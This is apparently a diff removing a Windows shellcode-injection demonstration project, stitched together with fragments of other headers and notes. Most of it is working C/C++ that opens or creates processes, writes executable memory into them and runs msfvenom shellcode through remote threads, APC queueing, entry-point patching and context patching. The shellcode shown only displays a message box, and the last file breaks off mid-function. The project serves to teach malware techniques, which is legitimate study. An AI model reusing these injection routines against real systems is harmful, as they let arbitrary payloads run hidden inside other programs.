#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <iostream>
// TODO: 在此处引用程序需要的其他头文件


@ -1,8 +0,0 @@
#pragma once
// 包括 SDKDDKVer.h 将定义可用的最高版本的 Windows 平台。
// 如果要为以前的 Windows 平台生成应用程序,请包括 WinSDKVer.h并将
// WIN32_WINNT 宏设置为要支持的平台,然后再包括 SDKDDKVer.h。
#include <SDKDDKVer.h>


@ -1,7 +0,0 @@
32 bit process Inject The dll to 32 bit process
64 bit process Inject The dll to 64 bit process
sometimes you maybe fail to inject because cann't openprocess successful
and many safe software will protect it avoiding you to inject
support more OS.


@ -1,13 +0,0 @@
# inject_shellcode
Small compendium of injection techniques commonly used in malware demonstrated on metasploit-generated shellcode<br/>
Various objects of injection:<br/>
+ existing process (found by name)
+ newly created process
Demonstrated methods:<br/>
+ Running shellcode in a new thread
+ Adding shellcode into existing thread (using NtQueueApcThread)
+ Patching Entry Point of the process
+ Patching context of the process
+ Injecting into Tray Window (using SetWindowLong)


@ -1,34 +0,0 @@
cmake_minimum_required (VERSION 2.8)
project (Injections)
add_definitions(-DUNICODE -D_UNICODE)
set (srcs
main.cpp
window_long_inject.cpp
sysutil.cpp
pe_hdrs_helper.cpp
)
set (hdrs
main.h
ntddk.h
ntdll_undoc.h
kernel32_undoc.h
map_buffer_into_process.h
target_util.h
payload.h
createproc.h
add_thread.h
add_apc.h
patch_ep.h
patch_context.h
window_long_inject.h
enumproc.h
sysutil.h
pe_hdrs_helper.h
)
add_executable (Injections ${hdrs} ${srcs})
INSTALL( TARGETS ${PROJECT_NAME} DESTINATION ${CMAKE_INSTALL_PREFIX} COMPONENT ${PROJECT_NAME} )


@ -1,21 +0,0 @@
#pragma once
#include <stdio.h>
#include "ntdll_undoc.h"
bool add_shellcode_to_apc(HANDLE hThread, LPVOID remote_shellcode_ptr)
{
#if defined(_WIN64)
printf("[ERROR] 64bit version of this method is not implemented!\n");
return false;
#else
printf("Adding shellcode to the queue\n");
NTSTATUS status = NULL;
if ((status = NtQueueApcThread(hThread, remote_shellcode_ptr, 0, 0, 0)) != STATUS_SUCCESS)
{
printf("[ERROR] NtQueueApcThread failed, status : %x\n", status);
return false;
}
return true;
#endif
}


@ -1,89 +0,0 @@
#pragma once
#include <stdio.h>
#include "ntddk.h"
#include "ntdll_undoc.h"
typedef enum {
usingRandomMethod,
usingCreateRemoteThread,
usingZwCreateThreadEx,
usingRtlCreateUserThread,
CREATION_METHODS_SIZE
} THREAD_CREATION_METHOD;
bool run_shellcode_in_new_thread1(HANDLE hProcess, LPVOID remote_shellcode_ptr)
{
NTSTATUS status = NULL;
//create a new thread for the injected code:
LPTHREAD_START_ROUTINE routine = (LPTHREAD_START_ROUTINE) remote_shellcode_ptr;
DWORD threadId = NULL;
HANDLE hMyThread = NULL;
if ((hMyThread = CreateRemoteThread(hProcess, NULL, NULL, routine, NULL, CREATE_SUSPENDED, &threadId)) == NULL) {
printf("[ERROR] CreateRemoteThread failed, status : %x\n", GetLastError());
return false;
}
printf("Created Thread, id = %x\n", threadId);
printf("Resuming added thread...\n");
ResumeThread(hMyThread); //injected code
return true;
}
bool run_shellcode_in_new_thread2(HANDLE hProcess, LPVOID remote_shellcode_ptr)
{
NTSTATUS status = NULL;
HANDLE hMyThread = NULL;
//create a new thread for the injected code:
if ((status = ZwCreateThreadEx(&hMyThread, 0x1FFFFF, NULL, hProcess, remote_shellcode_ptr, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateThreadEx failed, status : %x\n", status);
return false;
}
printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
printf("Resuming added thread...\n");
ResumeThread(hMyThread); //injected code
return true;
}
bool run_shellcode_in_new_thread3(HANDLE hProcess, LPVOID remote_shellcode_ptr)
{
NTSTATUS status = NULL;
HANDLE hMyThread = NULL;
CLIENT_ID cid;
//create a new thread for the injected code:
if ((status = RtlCreateUserThread(hProcess, NULL, true, 0, 0, 0, remote_shellcode_ptr, NULL, &hMyThread, &cid)) != STATUS_SUCCESS)
{
printf("[ERROR] RtlCreateUserThread failed, status : %x\n", status);
return false;
}
printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
printf("Resuming added thread...\n");
ResumeThread(hMyThread); //injected code
return true;
}
//---
bool run_shellcode_in_new_thread(HANDLE hProcess, LPVOID remote_shellcode_ptr, DWORD method)
{
bool isSuccess = false;
DWORD max = CREATION_METHODS_SIZE - 1;
DWORD random = (GetTickCount() * 1000) % max + 1;
if (method > max || method <= usingRandomMethod) method = random;
printf("Injecting by method, id = %x\n", method);
switch (method) {
case usingCreateRemoteThread:
isSuccess = run_shellcode_in_new_thread1(hProcess, remote_shellcode_ptr);
break;
case usingZwCreateThreadEx:
isSuccess = run_shellcode_in_new_thread2(hProcess, remote_shellcode_ptr);
break;
case usingRtlCreateUserThread:
isSuccess = run_shellcode_in_new_thread3(hProcess, remote_shellcode_ptr);
break;
default:
return false;
}
return isSuccess;
}


@ -1,59 +0,0 @@
#pragma once
#include "kernel32_undoc.h"
bool create_new_process1(PROCESS_INFORMATION &pi, LPWSTR cmdLine, LPWSTR startDir = NULL)
{
STARTUPINFO si;
memset(&si, 0, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
if (!CreateProcess(
NULL,
cmdLine,
NULL, //lpProcessAttributes
NULL, //lpThreadAttributes
FALSE, //bInheritHandles
DETACHED_PROCESS|CREATE_SUSPENDED|CREATE_NO_WINDOW, //dwCreationFlags
NULL, //lpEnvironment
startDir, //lpCurrentDirectory
&si, //lpStartupInfo
&pi //lpProcessInformation
))
{
printf("[ERROR] CreateProcess failed, Error = %x\n", GetLastError());
return false;
}
return true;
}
bool create_new_process2(PROCESS_INFORMATION &pi, LPWSTR cmdLine, LPWSTR startDir = NULL)
{
STARTUPINFO si;
memset(&si, 0, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
HANDLE hToken = NULL;
HANDLE hNewToken = NULL;
if (!CreateProcessInternalW (hToken,
NULL, //lpApplicationName
(LPWSTR) cmdLine, //lpCommandLine
NULL, //lpProcessAttributes
NULL, //lpThreadAttributes
FALSE, //bInheritHandles
CREATE_SUSPENDED|DETACHED_PROCESS|CREATE_NO_WINDOW, //dwCreationFlags
NULL, //lpEnvironment
startDir, //lpCurrentDirectory
&si, //lpStartupInfo
&pi, //lpProcessInformation
&hNewToken
))
{
printf("[ERROR] CreateProcessInternalW failed, Error = %x\n", GetLastError());
return false;
}
return true;
}


@ -1,55 +0,0 @@
#pragma once
#include <psapi.h>
bool get_process_name(IN HANDLE hProcess, OUT LPWSTR nameBuf, IN SIZE_T nameMax)
{
HMODULE hMod;
DWORD cbNeeded;
if (EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded)) {
GetModuleBaseName( hProcess, hMod, nameBuf, nameMax );
return true;
}
return false;
}
bool is_searched_process( DWORD processID, LPWSTR searchedName)
{
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID );
if (hProcess == NULL) return false;
WCHAR szProcessName[MAX_PATH];
if (get_process_name(hProcess, szProcessName, MAX_PATH)) {
if (wcsstr(szProcessName, searchedName) != NULL) {
printf( "%S (PID: %u)\n", szProcessName, processID );
CloseHandle(hProcess);
return true;
}
}
CloseHandle(hProcess);
return false;
}
HANDLE find_running_process(LPWSTR searchedName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded)) {
return NULL;
}
//calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
//search handle to the process of defined name
for ( i = 0; i < cProcesses; i++ ) {
if( aProcesses[i] != 0 ) {
if (is_searched_process(aProcesses[i], searchedName)) {
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, aProcesses[i]);
return hProcess;
}
}
}
return NULL;
}


@ -1,32 +0,0 @@
#pragma once
#include <Windows.h>
//don't forget to load functiond before use:
//load_kernel32_functions();
//
BOOL
(WINAPI *CreateProcessInternalW)(HANDLE hToken,
LPCWSTR lpApplicationName,
LPWSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation,
PHANDLE hNewToken
);
BOOL load_kernel32_functions()
{
HMODULE hKernel32 = GetModuleHandleA("kernel32");
CreateProcessInternalW = (BOOL (WINAPI *)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES,BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION, PHANDLE)) GetProcAddress(hKernel32,"CreateProcessInternalW");
if (CreateProcessInternalW == NULL) return FALSE;
return TRUE;
}


@ -1,127 +0,0 @@
#include <Windows.h>
#include <iostream>
#include "main.h"
#include "createproc.h"
#include "enumproc.h"
#include "payload.h"
#include "map_buffer_into_process.h"
#include "sysutil.h"
typedef enum {
ADD_THREAD,
ADD_APC,
PATCH_EP,
PATCH_CONTEXT
} INJECTION_POINT;
typedef enum {
EXISTING_PROC,
NEW_PROC,
TRAY_WINDOW
} TARGET_TYPE;
using namespace std;
bool inject_in_new_process(INJECTION_POINT mode)
{
//get target path
WCHAR cmdLine[MAX_PATH];
get_calc_path(cmdLine, MAX_PATH);
WCHAR startDir[MAX_PATH];
if (!get_dir(cmdLine, startDir)) {
GetSystemDirectory(startDir, MAX_PATH);
}
printf("Target: %S\n", cmdLine);
//create suspended process
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
if (create_new_process2(pi, cmdLine, startDir) == false) {
return false;
}
LPVOID remote_shellcode_ptr = map_buffer_into_process1(pi.hProcess, g_Shellcode, sizeof(g_Shellcode), PAGE_EXECUTE_READWRITE);
bool result = false;
switch (mode) {
case ADD_THREAD:
result = run_shellcode_in_new_thread(pi.hProcess, remote_shellcode_ptr, THREAD_CREATION_METHOD::usingRandomMethod);
// not neccessery to resume the main thread
break;
case ADD_APC:
result = add_shellcode_to_apc(pi.hThread, remote_shellcode_ptr);
ResumeThread(pi.hThread); //resume the main thread
break;
case PATCH_EP:
result = paste_shellcode_at_ep(pi.hProcess, remote_shellcode_ptr, pi.hThread);
ResumeThread(pi.hThread); //resume the main thread
break;
case PATCH_CONTEXT:
result = patch_context(pi.hThread, remote_shellcode_ptr);
ResumeThread(pi.hThread); //resume the main thread
break;
}
//close handles
ZwClose(pi.hThread);
ZwClose(pi.hProcess);
return result;
}
bool inject_in_existing_process()
{
HANDLE hProcess = find_running_process(L"firefox.exe");
LPVOID remote_shellcode_ptr = map_buffer_into_process1(hProcess, g_Shellcode, sizeof(g_Shellcode), PAGE_EXECUTE_READWRITE);
if (remote_shellcode_ptr == NULL) {
return false;
}
return run_shellcode_in_new_thread(hProcess, remote_shellcode_ptr, THREAD_CREATION_METHOD::usingRandomMethod);
}
int main()
{
if (load_ntdll_functions() == FALSE) {
printf("Failed to load NTDLL function\n");
return (-1);
}
if (load_kernel32_functions() == FALSE) {
printf("Failed to load KERNEL32 function\n");
return (-1);
}
// compatibility checks:
if (!is_system32b()) {
printf("[WARNING] Your ystem is NOT 32 bit! Some of the methods may not work.\n");
}
if (!is_compiled_32b()) {
printf("[WARNING] It is recommended to compile the loader as a 32 bit application!\n");
}
// choose the method:
TARGET_TYPE targetType = TARGET_TYPE::NEW_PROC;
switch (targetType) {
case TARGET_TYPE::TRAY_WINDOW:
if (!is_system32b()) {
printf("[ERROR] Not supported! Your system is NOT 32 bit!\n");
break;
}
// this injection is more fragile, use shellcode that makes no assumptions about the context
if (inject_into_tray(g_Shellcode, sizeof(g_Shellcode))) {
printf("[SUCCESS] Code injected into tray window!\n");
break;
}
case TARGET_TYPE::EXISTING_PROC:
if (inject_in_existing_process()) {
printf("[SUCCESS] Code injected into existing process!\n");
break;
}
case TARGET_TYPE::NEW_PROC:
if (inject_in_new_process(INJECTION_POINT::PATCH_EP)) {
printf("[SUCCESS] Code injected into a new process!\n");
break;
}
}
system("pause");
return 0;
}


@ -1,13 +0,0 @@
#pragma once
#include "ntdll_undoc.h"
#include "kernel32_undoc.h"
#include "target_util.h"
//injection types:
#include "add_thread.h"
#include "add_apc.h"
#include "patch_ep.h"
#include "patch_context.h"
#include "window_long_inject.h"


@ -1,67 +0,0 @@
#pragma once
#include <stdio.h> // for printf
#include <wchar.h>
#include "ntddk.h"
//set of alternative functions doing the same by a different way
PVOID map_buffer_into_process1(HANDLE hProcess, LPBYTE buffer, SIZE_T buffer_size, DWORD protect = PAGE_EXECUTE_READWRITE)
{
HANDLE hSection = NULL;
OBJECT_ATTRIBUTES hAttributes;
memset(&hAttributes, 0, sizeof(OBJECT_ATTRIBUTES));
LARGE_INTEGER maxSize;
maxSize.HighPart = 0;
maxSize.LowPart = static_cast<DWORD>(buffer_size);
NTSTATUS status = NULL;
if ((status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &maxSize, protect, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateSection failed, status : %x\n", status);
return NULL;
}
PVOID sectionBaseAddress = NULL;
ULONG viewSize = 0;
SECTION_INHERIT inheritDisposition = ViewShare; //VIEW_SHARE
// map the section in context of current process:
if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(), &sectionBaseAddress, NULL, NULL, NULL, &viewSize, inheritDisposition, NULL, protect)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
printf("Section BaseAddress: %p\n", sectionBaseAddress);
memcpy (sectionBaseAddress, buffer, buffer_size);
printf("Buffer copied!\n");
//map the new section into context of opened process
PVOID sectionBaseAddress2 = NULL;
if ((status = NtMapViewOfSection(hSection, hProcess, &sectionBaseAddress2, NULL, NULL, NULL, &viewSize, ViewShare, NULL, protect)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
//unmap from the context of current process
ZwUnmapViewOfSection(GetCurrentProcess(), sectionBaseAddress);
ZwClose(hSection);
printf("Section mapped at address: %p\n", sectionBaseAddress2);
return sectionBaseAddress2;
}
LPVOID map_buffer_into_process2(HANDLE hProcess, LPBYTE buffer, SIZE_T buffer_size, DWORD protect = PAGE_EXECUTE_READWRITE)
{
LPVOID remoteAddress = VirtualAllocEx(hProcess, NULL, buffer_size, MEM_COMMIT | MEM_RESERVE, protect);
if (remoteAddress == NULL) {
printf("Could not allocate memory in the remote process\n");
return NULL;
}
if (!WriteProcessMemory(hProcess, remoteAddress, buffer, buffer_size, NULL)) {
VirtualFreeEx(hProcess,remoteAddress, buffer_size, MEM_FREE);
return NULL;
}
return remoteAddress;
}



@ -1,72 +0,0 @@
#pragma once
#include <Windows.h>
#include "ntddk.h"
//undocumented functions from ntdll.dll
//
//don't forget to load functions before use:
//load_ntdll_functions();
NTSTATUS (NTAPI *NtQueueApcThread)(
IN HANDLE ThreadHandle,
IN PVOID ApcRoutine,
IN PVOID ApcRoutineContext OPTIONAL,
IN PVOID ApcStatusBlock OPTIONAL,
IN ULONG ApcReserved OPTIONAL
);
NTSTATUS (NTAPI *ZwSetInformationThread) (
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength
);
NTSTATUS (NTAPI *ZwCreateThreadEx) (
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN ULONG_PTR ZeroBits,
IN SIZE_T StackSize OPTIONAL,
IN SIZE_T MaximumStackSize OPTIONAL,
IN PVOID AttributeList OPTIONAL
);
NTSTATUS (NTAPI *RtlCreateUserThread) (
IN HANDLE ProcessHandle,
IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
IN BOOLEAN CreateSuspended,
IN ULONG StackZeroBits,
IN OUT PULONG StackReserved,
IN OUT PULONG StackCommit,
IN PVOID StartAddress,
IN PVOID StartParameter OPTIONAL,
OUT PHANDLE ThreadHandle,
OUT PCLIENT_ID ClientID
);
BOOL load_ntdll_functions()
{
HMODULE hNtdll = GetModuleHandleA("ntdll");
if (hNtdll == NULL) return FALSE;
NtQueueApcThread = (NTSTATUS (NTAPI *)(HANDLE, PVOID, PVOID, PVOID, ULONG)) GetProcAddress(hNtdll,"NtQueueApcThread");
if (NtQueueApcThread == NULL) return FALSE;
ZwSetInformationThread = (NTSTATUS (NTAPI *)(HANDLE, THREADINFOCLASS, PVOID, ULONG)) GetProcAddress(hNtdll,"ZwSetInformationThread");
if (ZwSetInformationThread == NULL) return FALSE;
ZwCreateThreadEx = (NTSTATUS (NTAPI *) (PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID)) GetProcAddress(hNtdll,"ZwCreateThreadEx");
if (ZwCreateThreadEx == NULL) return FALSE;
RtlCreateUserThread = (NTSTATUS (NTAPI *) (HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN,ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID)) GetProcAddress(hNtdll,"RtlCreateUserThread");
if (RtlCreateUserThread == NULL) return FALSE;
return TRUE;
}


@ -1,39 +0,0 @@
#pragma once
#include <Windows.h>
//32-bit version
bool patch_context(HANDLE hThread, LPVOID remote_shellcode_ptr)
{
//get initial context of the target:
BOOL res = FALSE;
#if defined(_WIN64)
WOW64_CONTEXT context;
memset(&context, 0, sizeof(WOW64_CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
res = Wow64GetThreadContext(hThread, &context);
#else
CONTEXT context;
memset(&context, 0, sizeof(CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
res = GetThreadContext(hThread, &context);
#endif
if (res == FALSE) {
return false;
}
//if the process was created as suspended and didn't run yet, EAX holds it's entry point:
context.Eax = (DWORD) remote_shellcode_ptr;
#if defined(_WIN64)
Wow64SetThreadContext(hThread, &context);
#else
res = SetThreadContext(hThread, &context);
#endif
if (res == FALSE) {
return false;
}
printf("patched context -> EAX = %x\n", context.Eax);
return true;
}


@ -1,140 +0,0 @@
#pragma once
#include <stdio.h>
#include "ntddk.h"
#include "pe_hdrs_helper.h"
#define PAGE_SIZE 0x1000
// Get image base by a method #1:
LPCVOID getTargetImageBase1(HANDLE hProcess)
{
PROCESS_BASIC_INFORMATION pbi;
memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION));
if (NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0)
{
printf("[ERROR] NtQueryInformationProcess failed\n");
return NULL;
}
printf("PEB = %p\n", (LPVOID)pbi.PebBaseAddress);
LPCVOID ImageBase = 0;
SIZE_T read_bytes = 0;
if (!ReadProcessMemory(hProcess, (BYTE*)pbi.PebBaseAddress + 8, &ImageBase, sizeof(ImageBase), &read_bytes)
|| read_bytes != sizeof(ImageBase)
)
{
printf("[ERROR] Cannot read from PEB - incompatibile target!\n");
return NULL;
}
return ImageBase;
}
// Get image base by a method #2:
// WARNING: this method of getting Image Base works only if
// the process has been created as a SUSPENDED and didn't run yet
// - it uses specific values of the registers, that are set only in this case.
LPCVOID getTargetImageBase2(HANDLE hProcess, HANDLE hThread)
{
//get initial context of the target:
#if defined(_WIN64)
WOW64_CONTEXT context;
memset(&context, 0, sizeof(WOW64_CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
Wow64GetThreadContext(hThread, &context);
#else
CONTEXT context;
memset(&context, 0, sizeof(CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
GetThreadContext(hThread, &context);
#endif
//get image base of the target:
DWORD PEB_addr = context.Ebx;
const SIZE_T kPtrSize = sizeof(DWORD); //for 32 bit
DWORD targetImageBase = 0; //for 32 bit
printf("PEB = %x\n", PEB_addr);
if (!ReadProcessMemory(hProcess, LPVOID(PEB_addr + 8), &targetImageBase, kPtrSize, NULL)) {
printf("[ERROR] Cannot read from PEB - incompatibile target!\n");
return false;
}
return (LPCVOID)((ULONGLONG)targetImageBase);
}
bool paste_shellcode_at_ep(HANDLE hProcess, LPVOID remote_shellcode_ptr, HANDLE hThread=NULL)
{
LPCVOID ImageBase = NULL; //target ImageBase
if (hThread != NULL) {
ImageBase = getTargetImageBase2(hProcess, hThread);
} else {
#if defined(_WIN64)
printf("[ERROR] 64bit version of this method is not implemented!\n");
return false;
#else
ImageBase = getTargetImageBase1(hProcess);
#endif
}
if (ImageBase == NULL) {
printf("[ERROR] Fetching ImageBase failed!\n");
return false;
}
printf("ImageBase = 0x%p\n", ImageBase);
// read headers:
SIZE_T read_bytes = 0;
BYTE hdrs_buf[PAGE_SIZE];
if (!ReadProcessMemory(hProcess, ImageBase, hdrs_buf, sizeof(hdrs_buf), &read_bytes) && read_bytes != sizeof(hdrs_buf))
{
printf("[-] ReadProcessMemory failed\n");
return false;
}
// fetch Entry Point From headers
IMAGE_NT_HEADERS32 *inh = get_nt_hrds32(hdrs_buf);
if (inh == NULL) return false;
IMAGE_OPTIONAL_HEADER32 opt_hdr = inh->OptionalHeader;
DWORD ep_rva = opt_hdr.AddressOfEntryPoint;
printf("Entry Point v: %x\n", ep_rva);
printf("shellcode ptr: %p\n", remote_shellcode_ptr);
//make a buffer to store the hook code:
const SIZE_T kHookSize = 0x10;
BYTE hook_buffer[kHookSize];
memset(hook_buffer, 0xcc, kHookSize);
//prepare the redirection:
//address of the shellcode will be pushed on the stack and called via ret
hook_buffer[0] = 0x68; //push
hook_buffer[5] = 0xC3; //ret
//for 32bit code:
DWORD shellcode_addr = (DWORD)remote_shellcode_ptr;
memcpy(hook_buffer + 1, &shellcode_addr, sizeof(shellcode_addr));
//make a memory page containing Entry Point Writable:
DWORD oldProtect;
if (!VirtualProtectEx(hProcess, (BYTE*)ImageBase + ep_rva, kHookSize, PAGE_EXECUTE_READWRITE, &oldProtect)) {
printf("Virtual Protect Failed!\n");
return false;
}
//paste the redirection at Entry Point:
SIZE_T writen_bytes = 0;
if (!WriteProcessMemory(hProcess, (LPBYTE)ImageBase + ep_rva, hook_buffer, sizeof(hook_buffer) , &writen_bytes))
{
printf("[-] WriteProcessMemory failed, err = %d\n", GetLastError());
return false;
}
//restore the previous access rights at entry point:
DWORD oldProtect2;
if (!VirtualProtectEx(hProcess, (BYTE*)ImageBase + ep_rva, kHookSize, oldProtect, &oldProtect2)) {
printf("Virtual Protect Failed!\n");
return false;
}
return true;
}


@ -1,30 +0,0 @@
#pragma once
/*
msfvenom -a x86 --platform Windows
-p windows/messagebox
TEXT="This is an injection demo!"
TITLE="Injection Demo"
-f c
*/
unsigned char g_Shellcode[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6d\x6f\x58\x20\x68\x6e\x20"
"\x44\x65\x68\x63\x74\x69\x6f\x68\x49\x6e\x6a\x65\x31\xdb\x88"
"\x5c\x24\x0e\x89\xe3\x68\x6f\x21\x58\x20\x68\x20\x64\x65\x6d"
"\x68\x74\x69\x6f\x6e\x68\x6e\x6a\x65\x63\x68\x61\x6e\x20\x69"
"\x68\x20\x69\x73\x20\x68\x54\x68\x69\x73\x31\xc9\x88\x4c\x24"
"\x1a\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff"
"\x55\x08";


@ -1,32 +0,0 @@
#include "pe_hdrs_helper.h"
IMAGE_NT_HEADERS32* get_nt_hrds32(BYTE *pe_buffer)
{
if (pe_buffer == NULL) return NULL;
IMAGE_DOS_HEADER *idh = (IMAGE_DOS_HEADER*)pe_buffer;
if (idh->e_magic != IMAGE_DOS_SIGNATURE) {
return NULL;
}
const LONG kMaxOffset = 1024;
LONG pe_offset = idh->e_lfanew;
if (pe_offset > kMaxOffset) return NULL;
IMAGE_NT_HEADERS32 *inh = (IMAGE_NT_HEADERS32 *)((BYTE*)pe_buffer + pe_offset);
return inh;
}
IMAGE_DATA_DIRECTORY* get_pe_directory32(PVOID pe_buffer, DWORD dir_id)
{
if (dir_id >= IMAGE_NUMBEROF_DIRECTORY_ENTRIES) return NULL;
//fetch relocation table from current image:
PIMAGE_NT_HEADERS32 nt_headers = get_nt_hrds32((BYTE*) pe_buffer);
if (nt_headers == NULL) return NULL;
IMAGE_DATA_DIRECTORY* peDir = &(nt_headers->OptionalHeader.DataDirectory[dir_id]);
if (peDir->VirtualAddress == NULL) {
return NULL;
}
return peDir;
}


@ -1,5 +0,0 @@
#pragma once
#include <Windows.h>
IMAGE_NT_HEADERS32* get_nt_hrds32(BYTE *pe_buffer);
IMAGE_DATA_DIRECTORY* get_pe_directory32(PVOID pe_buffer, DWORD dir_id);


@ -1,52 +0,0 @@
#pragma once
#include "sysutil.h"
#include <windows.h>
#include <stdio.h>
#include "pe_hdrs_helper.h"
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
bool is_compiled_32b()
{
if (sizeof(LPVOID) == sizeof(DWORD)) {
return true;
}
return false;
}
bool is_wow64()
{
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = false;
//IsWow64Process is not available on all supported versions of Windows.
//Use GetModuleHandle to get a handle to the DLL that contains the function
//and GetProcAddress to get a pointer to the function if available.
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
if (fnIsWow64Process == NULL) {
return false;
}
if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) {
return false;
}
if (bIsWow64 == TRUE) {
return true; //64 bit
}
return false; //32 bit
}
bool is_system32b()
{
//is the current application 32 bit?
if (!is_compiled_32b()) {
return false;
}
//check if it is running under WoW
if (is_wow64()) {
return false;
}
return true;
}


@ -1,9 +0,0 @@
#pragma once
#include <windows.h>
#define PAGE_SIZE 0x1000
bool is_compiled_32b();
bool is_wow64();
bool is_system32b();
bool is_target_32bit(HANDLE hProcess, LPVOID ImageBase);


@ -1,117 +0,0 @@
#pragma once
#include <wchar.h>
void replace_param(LPWSTR cmdBuf, SIZE_T cmdBufSize, LPWSTR paramVal)
{
wchar_t * pwc;
printf("--\n");
pwc = wcsstr (cmdBuf, L"%1");
if (pwc == NULL) return; //param not found
SIZE_T paramLen = wcslen(paramVal);
SIZE_T offset = pwc - cmdBuf;
if (offset + paramLen + 1 >= cmdBufSize) return; //no space in buffer
wcsncpy (pwc, paramVal, paramLen);
cmdBuf[offset + paramLen + 1] = NULL;
if (offset == 0) return;
if (cmdBuf[offset-1] == '\"' || cmdBuf[offset-1] == '\'') {
cmdBuf[offset + paramLen] = cmdBuf[0];
cmdBuf[offset + paramLen + 1] = NULL;
}
}
void remove_params(LPWSTR cmdLine, SIZE_T cmdLineLen)
{
wchar_t * pwc;
printf("--\n");
WCHAR extension[] = L".exe";
SIZE_T extensionLen = wcslen(extension);
pwc = wcsstr (cmdLine, extension);
if (pwc == NULL) return;
SIZE_T offset = pwc - cmdLine;
cmdLine[offset + extensionLen] = NULL;
if (cmdLine[0] == '\"' || cmdLine[0] == '\'') {
cmdLine[offset + extensionLen] = cmdLine[0];
cmdLine[offset + extensionLen + 1] = NULL;
}
}
bool get_dir(LPWSTR cmdLine, OUT LPWSTR dirBuf, SIZE_T dirBufLen = MAX_PATH)
{
wchar_t * pwc;
pwc = wcsrchr (cmdLine, L'\\');
if (pwc == NULL) {
pwc = wcsrchr (cmdLine, L'/');
}
if (pwc == NULL) return false;
SIZE_T offset = pwc - cmdLine + 1;
if (offset >= dirBufLen) return false;
